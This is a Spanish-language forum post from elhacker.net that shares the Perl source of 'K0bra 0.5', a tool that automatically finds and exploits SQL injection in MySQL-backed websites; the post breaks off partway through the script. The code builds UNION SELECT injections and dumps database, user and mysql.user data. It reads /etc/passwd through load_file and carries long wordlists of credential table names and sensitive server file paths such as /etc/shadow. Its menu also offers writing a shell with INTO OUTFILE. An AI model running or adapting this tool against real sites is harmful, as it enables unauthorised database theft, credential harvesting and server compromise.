elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Perl] K0bra 0.5
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Perl] K0bra 0.5  (Leído 2,625 veces)
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
[Perl] K0bra 0.5
« en: 10 Octubre 2011, 16:53 pm »

Bueno esta es la nueva version de un scanner sqli que habia hecho ,
le arregle varios errores y agregue algunas cosas

Código
  1. #!usr/bin/perl
  2. #k0bra 0.5
  3. #Automatic SQL Scanner for MYSQL
  4. #(c)0ded By Doddy H
  5. #
  6. #
  7. #C:\Users\DoddyH>perl k0bra.pl http://127.0.0.1/sql.php?id= --
  8. #
  9. #
  10. #
  11. #
  12. # @      @@   @
  13. #@@     @  @ @@
  14. # @ @@  @  @  @ @   @ @ @@@
  15. # @ @   @  @  @@ @ @@@ @  @
  16. # @@    @  @  @  @  @   @@@
  17. # @ @   @  @  @  @  @  @  @
  18. #@@@ @   @@   @@@  @@@ @@@@@
  19. #
  20. #
  21. #
  22. #
  23. #[Status] : Scanning.....
  24. #[Status] : Enjoy the menu
  25. #
  26. #[Target confirmed] : http://127.0.0.1/sql.php?id=-1+union+select+hackman,2,3
  27. #[Bypass] : --
  28. #
  29. #
  30. #
  31. #--== information_schema.tables ==--
  32. #
  33. #[1] : Show tables
  34. #[2] : Show columns
  35. #[3] : Show DBS
  36. #[4] : Show tables witg other DB
  37. #[5] : Show columns with other DB
  38. #
  39. #
  40. #--== mysql.user ==--
  41. #
  42. #[6] : Show users
  43. #
  44. #
  45. #--== Others ==--
  46. #
  47. #[7] : Fuzzing tables
  48. #[8] : Fuzzing columns
  49. #[9] : Fuzzing files with load_file
  50. #[10] : Dump
  51. #[11] : Informacion of the server
  52. #[12] : Create a shell with into outfile
  53. #[13] : Show Log
  54. #[14] : Exit
  55. #
  56. #
  57. #[Option] : Enjoy this program xDDDDD
  58. #
  59.  
  60. system('cls');
  61. system ("title k0bra");
  62.  
  63.  
  64.  
  65. @buscar1 =('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario','web_users','name','names','nombre','nombres','usuarios','member','members','admin_table','usuaris','web_usuarios','miembro','miembros','membername','admins','administrator','sign','config','USUARIS','cms_operadores','administrators','passwd','password','passwords','pass','Pass','mpn_authors','author','musuario','mysql.user','user_names','foro','tAdmin','tadmin','user_password','user_passwords','user_name','member_password','mods','mod','moderators','moderator','user_email','jos_users','mb_user','host','apellido_nombre','user_emails','user_mail','user_mails','mail','emails','email','address','jos_usuarios','tutorial_user_auth','e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','tbl_usuarios','user_auth','login_radio','registers','register','usr','usrs','ps','pw','un','u_name','u_pass','tbl_admin','usuarios_head','tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','BG_CMS_Users','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id','foro_usuarios','cliente','sistema_usuario','sistema_password','contrasena','auth','key','senha','signin','dir_admin','alias','clientes','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','calendar_users','cursos','tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','curso','membros','utilizadores','staff','nuke_authors','accounts','account','accnts','signup','leads','lead','associated','accnt','customers','customer','membres','administrateur','utilisateur','riacms_users','tuser','tusers','utilisateurs','amministratore','god','God','authors','wp_users','tb_usuarios','asociado','asociados','autores','autor','Users','Admin','Members','tb_usuario','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO','USR_NAME','about','access','admin_id','admin_name','admin_pass','admin_passwd','admin_password','admin_pwd','admin_user','admin_userid','admin_username','adminemail','adminid','administrator_name','adminlogin','adminmail','adminname','adminuser','adminuserid','adminusername','aid','aim','apwd','auid','authenticate','authentication','blog','cc_expires','cc_number','cc_owner','cc_type','cfg','cid','clientname','clientpassword','clientusername','conf','contact','converge_pass_hash','converge_pass_salt','crack','customers_email_address','customers_password','cvvnumber]','data','db_database_name','db_hostname','db_password','db_username','download','e_mail','emer','emni','emniplote','emri','fjalekalimi','fjalekalimin','full','gid','group','group_name','hash','hashsalt','homepage','icq','icq_number','id','id_group','id_member','images','ime','index','ip_address','kodi','korisnici','korisnik','kpro_user','last_ip','last_login','lastname','llogaria','login_admin','login_name','login_pass','login_passwd','login_password','login_pw','login_pwd','login_user','login_username','logini','loginkey','loginout','logo','logohu','lozinka','md5hash','mem_login','mem_pass','mem_passwd','mem_password','mem_pwd','member_id','member_login_key','member_name','memberid','memlogin','mempassword','my_email','my_name','my_password','my_username','myname','mypassword','myusername','nc','new','news','number','nummer','p_assword','p_word','pass_hash','pass_w','pass_word','pass1word','passw','passwordsalt','passwort','passwrd','perdorimi','perdoruesi','personal_key','phone','privacy','psw','punetoret','punonjes','pword','pwrd','salt','search','secretanswer','secretquestion','serial','session_member_id','session_member_login_key','sesskey','setting','sid','sifra','spacer','status','store','store1','store2','store3','store4','table_prefix','temp_pass','temp_password','temppass','temppasword','text','uid','uname','user_admin','user_icq','user_id','user_ip','user_level','user_login','user_n','user_pass','user_passw','user_passwd','user_pw','user_pwd','user_pword','user_pwrd','user_un','user_uname','user_username','user_usernm','user_usernun','user_usrnm','user1','useradmin','userid','userip','userlogin','usern','usernm','userpass','userpassword','userpw','userpwd','usr_n','usr_name','usr_pass','usr2','usrn','usrnam','usrname','usrnm','usrpass','warez','xar_name','xar_pass','nom dutilisateur','mot de passe','compte','comptes','aide','objectif','authentifier','authentification','Contact','fissure','client','clients','de donn?es','mot_de_passe_bdd','t?l?charger','E-mail','adresse e-mail','Emer','complet','groupe','hachage','Page daccueil','Kodi','nom','connexion','membre','MEMBERNAME','mon_mot_de_passe','monmotdepasse','ignatiusj','caroline-du-nord','nouveau','Nick','passer','Passw','Mot de passe','t?l?phone','protection de la vie priv?e','PSW','pWord','sel','recherche','de s?rie','param?tre','?tat','stocker','texte','cvvnumber');
  66.  
  67. @buscar2 = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email','senha','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail','cliente','usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','host','pws','cedula','userName','host_password','chave','alias','apellido_nombre','cliente_nombre','cliente_email','cliente_pass','cliente_user','cliente_usuario','login_id','sistema_id','author','user_login','admin_user','admin_pass','uh_usuario','uh_password','psw','host_username','sistema_usuario','auth','key','usuarios_nombre','usuarios_nick','usuarios_password','user_clave','membername','nme','unme','password','user_password','autores','pass_hash','hash','pass','correo','usuario_nombre','usuario_nick','usuario_password','userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors','user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username','tbladmins','sort','_wfspro_admin','4images_users','a_admin','account','accounts','adm','admin','admin_login','admin_userinfo','administer','administrable','administrate','administration','administrator','administrators','adminrights','admins','adminuser','art','article_admin','articles','artikel','ÃÜë','aut','autore','backend','backend_users','backenduser','bbs','book','chat_config','chat_messages','chat_users','client','clients','clubconfig','company','config','contact','contacts','content','control','cpg_config','cpg132_users','customer','customers','customers_basket','dbadmins','dealer','dealers','diary','download','Dragon_users','e107.e107_user','e107_user','forum.ibf_members','fusion_user_groups','fusion_users','group','groups','ibf_admin_sessions','ibf_conf_settings','ibf_members','ibf_members_converge','ibf_sessions','icq','images','index','info','ipb.ibf_members','ipb_sessions','joomla_users','jos_blastchatc_users','jos_comprofiler_members','jos_contact_details','jos_joomblog_users','jos_messages_cfg','jos_moschat_users','jos_users','knews_lostpass','korisnici','kpro_adminlogs','kpro_user','links','login_admin','login_admins','login_user','login_users','logins','logs','lost_pass','lost_passwords','lostpass','lostpasswords','m_admin','main','mambo_session','mambo_users','manage','manager','mb_users','member','memberlist','members','minibbtable_users','mitglieder','movie','movies','mybb_users','mysql','mysql.user','names','news','news_lostpass','newsletter','nuke_authors','nuke_bbconfig','nuke_config','nuke_popsettings','nuke_users','Óû§','obb_profiles','order','orders','parol','partner','partners','passes','passwords','perdorues','perdoruesit','phorum_session','phorum_user','phorum_users','phpads_clients','phpads_config','phpbb_users','phpBB2.forum_users','phpBB2.phpbb_users','phpmyadmin.pma_table_info','pma_table_info','poll_user','punbb_users','pwds','reg_user','reg_users','registered','reguser','regusers','session','sessions','settings','shop.cards','shop.orders','site_login','site_logins','sitelogin','sitelogins','sites','smallnuke_members','smf_members','SS_orders','statistics','superuser','sysadmins','system','sysuser','sysusers','table','tables','tb_admin','tb_administrator','tb_login','tb_member','tb_members','tb_user','tb_username','tb_usernames','tb_users','tbl','tbl_user','tbl_users','tbluser','tbl_clients','tbl_client','tblclients','tblclient','test','usebb_members','user_admin','user_info','user_list','user_logins','user_names','usercontrol','userinfo','userlist','userlogins','usernames','userrights','users','vb_user','vbulletin_session','vbulletin_user','voodoo_members','webadmin','webadmins','webmaster','webmasters','webuser','webusers','x_admin','xar_roles','xoops_bannerclient','xoops_users','yabb_settings','yabbse_settings','ACT_INFO','ActiveDataFeed','Category','CategoryGroup','ChicksPass','ClickTrack','Country','CountryCodes1','CustomNav','DataFeedPerformance1','DataFeedPerformance2','DataFeedPerformance2_incoming','DataFeedShowtag1','DataFeedShowtag2','DataFeedShowtag2_incoming','dtproperties','Event','Event_backup','Event_Category','EventRedirect','Events_new','Genre','JamPass','MyTicketek','MyTicketekArchive','News','PerfPassword','PerfPasswordAllSelected','Promotion','ProxyDataFeedPerformance','ProxyDataFeedShowtag','ProxyPriceInfo','Region','SearchOptions','Series','Sheldonshows','StateList','States','SubCategory','Subjects','Survey','SurveyAnswer','SurveyAnswerOpen','SurveyQuestion','SurveyRespondent','sysconstraints','syssegments','tblRestrictedPasswords','tblRestrictedShows','TimeDiff','Titles','ToPacmail1','ToPacmail2','UserPreferences','uvw_Category','uvw_Pref','uvw_Preferences','Venue','venues','VenuesNew','X_3945','tblArtistCategory','tblArtists','tblConfigs','tblLayouts','tblLogBookAuthor','tblLogBookEntry','tblLogBookImages','tblLogBookImport','tblLogBookUser','tblMails','tblNewCategory','tblNews','tblOrders','tblStoneCategory','tblStones','tblUser','tblWishList','VIEW1','viewLogBookEntry','viewStoneArtist','vwListAllAvailable','CC_info','CC_username','cms_user','cms_users','cms_admin','cms_admins','jos_user','table_user','bulletin','cc_info','login_name','admuserinfo','userlistuser_list','SiteLogin','Site_Login','UserAdmin','Admins','Login','Logins');
  68.  
  69.  
  70. @buscar3 =('c:/xampp/log.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog');
  71.  
  72. use LWP::UserAgent;
  73. use HTTP::Request;
  74. use HTTP::Request::Common;
  75. use URI::Split qw(uri_split);
  76.  
  77. my $nave = LWP::UserAgent->new();
  78. $nave->timeout(5);
  79. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  80.  
  81. &head;
  82. unless(@ARGV == 2) {
  83. &menu;
  84. } else {
  85. &scan($ARGV[0],$ARVG[1]);
  86. }
  87. &finish;
  88.  
  89. sub menu {
  90. print "[Page] : ";
  91. chomp(my $page=<STDIN>);
  92. print "\n[Bypass : -- /* %00] : ";
  93. chomp(my $bypass = <STDIN>);
  94. print "\n\n";
  95. &scan($page,$bypass);
  96. }
  97.  
  98. sub scan {
  99. print "[Status] : Scanning.....\n";
  100. $pass = &bypass($_[1]);
  101. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  102. my $save = $auth;
  103. if ($_[0]=~/hackman/ig) {
  104. savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
  105. &menu_options($_[0],$pass,$save);
  106. }
  107. my ($gen,$save,$control) = &length($_[0],$_[1]);
  108. if ($control eq 1) {
  109. print "[Status] : Enjoy the menu\n\n";
  110. &menu_options($gen,$pass,$save);
  111. } else {
  112. print $control;
  113. print "[Status] : Length columns not found\n\n";
  114. <STDIN>;
  115. &head;
  116. &menu;
  117. }
  118. }
  119.  
  120. sub head {
  121. system 'cls';
  122.  
  123.  
  124. @      @@   @            
  125. @@     @  @ @@            
  126. @ @@  @  @  @ @   @ @ @@@
  127. @ @   @  @  @@ @ @@@ @  @
  128. @@    @  @  @  @  @   @@@
  129. @ @   @  @  @  @  @  @  @
  130. @@@ @   @@   @@@  @@@ @@@@@
  131.  
  132.  
  133.  
  134.  
  135. );
  136. }
  137.  
  138.  
  139.  
  140.  
  141. sub copyright {
  142. print "\n\n\n\n(C) Doddy Hackman 2010\n\n";
  143. }
  144.  
  145.  
  146. sub toma {
  147. return $nave->request (GET $_[0])->content;
  148. }
  149.  
  150.  
  151. sub savefile {
  152. open (SAVE,">>logs/webs/".$_[0]);
  153. print SAVE $_[1]."\n";
  154. close SAVE;
  155. }
  156.  
  157. sub finish {
  158. print "\n\n\n(C) Doddy Hackman 2010\n\n";
  159. <STDIN>;
  160. exit(1);
  161. }
  162.  
  163.  
  164. sub length {
  165. my $rows  = "0";
  166. my $asc;
  167. my $page = $_[0];
  168. ($pass1,$pass2) = &bypass($_[1]);
  169. $inyection = $page."1".$pass1."and".$pass1."1=0".$pass1."order".$pass1."by"."9999999999".$pass2;
  170. $code = toma($inyection);
  171. if($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
  172. $code1 = toma($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1."666".$pass2);
  173. if ($code1=~/The used SELECT statements have a different number of columns/ig) {
  174. my $patha = $1;
  175. chomp $patha;
  176. $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
  177. $total = "1";
  178. for my $rows(2..200) {
  179. $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
  180. $total.= ",".$rows;
  181. $injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
  182. $test = toma($injection);
  183. if ($test=~/RATSXPDOWN/) {
  184. @number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
  185. $control = 1;
  186. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  187. my $save = $auth;
  188. savefile($save.".txt","\n[Target confirmed] : $page");
  189. savefile($save.".txt","[Bypass] : $_[1]\n");
  190. savefile($save.".txt","[Limit] : The site has $rows columns");
  191. savefile($save.".txt","[Data] : The number @number print data");
  192. if ($patha) {
  193. savefile($save.".txt","[Full Path Discloure] : $patha");
  194. }
  195. $total=~s/$number[0]/hackman/;
  196. savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
  197. return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
  198. }
  199. }
  200. }
  201. }
  202.  
  203. sub bypass {
  204. if ($_[0] eq "/*") { return ("/**/","/*"); }
  205. elsif ($_[0] eq "%20") { return ("%20","%00"); }
  206. else {return ("+","--");}}
  207.  
  208. sub ascii {
  209. return join ',',unpack "U*",$_[0];
  210. }
  211.  
  212. sub ascii_de {
  213. $_[0] = join q[], map { chr } split q[,],$_[0];
  214. return $_[0];
  215. }
  216.  
  217. sub details {
  218. my ($page,$bypass,$save) = @_;
  219. ($pass1,$pass2) = &bypass($bypass);
  220. savefile($save.".txt","\n");
  221. if ($page=~/(.*)hackman(.*)/ig) {
  222. print "\n\n[+] Searching information..\n\n";
  223. my  ($start,$end) = ($1,$2);
  224. $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
  225. $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
  226. $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  227. $test1 = toma($inforschema);
  228. $test2 = toma($mysqluser);
  229. if ($test2=~/ERTOR854/ig) {
  230. savefile($save.".txt","[mysql.user] : ON");
  231. print "[mysql.user] : ON\n";
  232. } else {
  233. print "[mysql.user] : OFF\n";
  234. savefile($save.".txt","[mysql.user] : OFF");
  235. }
  236. if ($test1=~/ERTOR854/ig) {
  237. print "[information_schema.tables] : ON\n";
  238. savefile($save.".txt","[information_schema.tables] : ON");
  239. } else {
  240. print "[information_schema.tables] : OFF\n";
  241. savefile($save.".txt","[information_schema.tables] : OFF");
  242. }
  243. if ($test3=~/ERTOR854/ig) {
  244. print "[+] load_file permite ver los archivos\n";
  245. savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  246. }
  247. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
  248. $injection = $start.$concat.$end.$pass2;
  249. $code = toma($injection);
  250. if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
  251. print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
  252. savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
  253. } else {
  254. print "\n[-] Not found any data\n";
  255. }
  256. }
  257. }
  258. }
  259.  
  260. sub menu_options {
  261. print "[Target confirmed] : $_[0]\n";
  262. print "[Bypass] : $_[1]\n\n";
  263.  
  264. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  265. my $save = $auth;
  266. print "[save] : /logs/webs/$save\n\n";
  267. print "\n\n--== information_schema.tables ==--\n\n";
  268. print "[1] : Show tables\n";
  269. print "[2] : Show columns\n";
  270. print "[3] : Show DBS\n";
  271. print "[4] : Show tables with other DB\n";
  272. print "[5] : Show columns with other DB\n";
  273. print "\n\n--== mysql.user ==--\n\n";
  274. print "[6] : Show users\n";
  275. print "\n\n--== Others ==--\n\n";
  276. print "[7] : Fuzzing tables\n";
  277. print "[8] : Fuzzing columns\n";
  278. print "[9] : Fuzzing files with load_file\n";
  279. print "[10] : Dump\n";
  280. print "[11] : Informacion of the server\n";
  281. print "[12] : Create a shell with into outfile\n";
  282. print "[13] : Show Log\n";
  283. print "[14] : Change Target\n";
  284. print "[15] : Exit\n";
  285. print "\n\n[Option] : ";
  286. chomp(my $opcion = <STDIN>);
  287. if ($opcion eq "1") {
  288. schematables($_[0],$_[1],$save);
  289. &reload;
  290. }
  291. elsif ($opcion eq "2") {
  292. print "\n\n[Tabla] : ";
  293. chomp(my $tabla = <STDIN>);
  294. schemacolumns($_[0],$_[1],$save,$tabla);
  295. &reload;
  296. }
  297. elsif ($opcion eq "3") {
  298. &schemadb($_[0],$_[1],$save);
  299. &reload;
  300. }
  301. elsif ($opcion eq "4") {
  302. print "\n\n[DAtabase] : ";
  303. chomp(my $data =<STDIN>);
  304. &schematablesdb($_[0],$_[1],$data,$save);
  305. &reload;
  306. }
  307. elsif ($opcion eq "5"){
  308. print "\n\n[DB] : ";
  309. chomp(my $db =<STDIN>);
  310. print "\n[Table] : ";
  311. chomp(my $table =<STDIN>);
  312. &schemacolumnsdb($_[0],$_[1],$db,$table,$save);
  313. &reload;
  314. }
  315. elsif ($opcion eq "6") {
  316. &mysqluser($_[0],$_[1],$save);
  317. &reload;
  318. }
  319. elsif ($opcion eq "13") {
  320. $t = "logs/webs/$save.txt";
  321. system("start $t");
  322. &reload;
  323. }
  324. elsif ($opcion eq "15") {
  325. &finish;
  326. }
  327. elsif ($opcion eq "14") {
  328. &head;
  329. &menu;
  330. }
  331. elsif ($opcion eq "7") {
  332. &tabfuzz($_[0],$_[1],$save);
  333. &reload;
  334. }
  335. elsif ($opcion eq "8") {
  336. print "\n\n[Tabla] : ";
  337. chomp(my $tab  = <STDIN>);
  338. &colfuzz($_[0],$_[1],$tab,$save);
  339. &reload;
  340. }
  341. elsif ($opcion eq "9") {
  342. &load($_[0],$_[1],$save);
  343. &reload;
  344. }
  345. elsif ($opcion eq "10") {
  346. print "\n\n[Table to dump] : ";
  347. chomp(my $tabla = <STDIN>);
  348. print "\n[Column 1] : ";
  349. chomp(my $col1 = <STDIN>);
  350. print "\n[Column 2] : ";
  351. chomp(my $col2 = <STDIN>);
  352. print "\n\n";
  353. &dump($_[0],$col1,$col2,$tabla,$_[1],$save);
  354. &reload;
  355. }
  356. elsif ($opcion eq "11") {
  357. print "\n\n";
  358. &details($_[0],$_[1],$save);
  359. &reload;
  360. }
  361. elsif ($opcion eq "12") {
  362. print "\n\n[Full Path Discloure] : ";
  363. chomp(my $path = <STDIN>);
  364. &into($_[0],$_[1],$path,$save);
  365. &reload;
  366. }
  367. else {
  368. &reload;
  369. }
  370. }
  371.  
  372. sub schematables {
  373. $real = "1";
  374. my ($page,$bypass,$save) = @_;
  375. savefile($save.".txt","\n");
  376. print "\n";
  377. my $page1 = $page;
  378. ($pass1,$pass2) = &bypass($_[1]);
  379. savefile($save.".txt","[DB] : default");
  380. print "[+] Searching tables with schema\n\n";
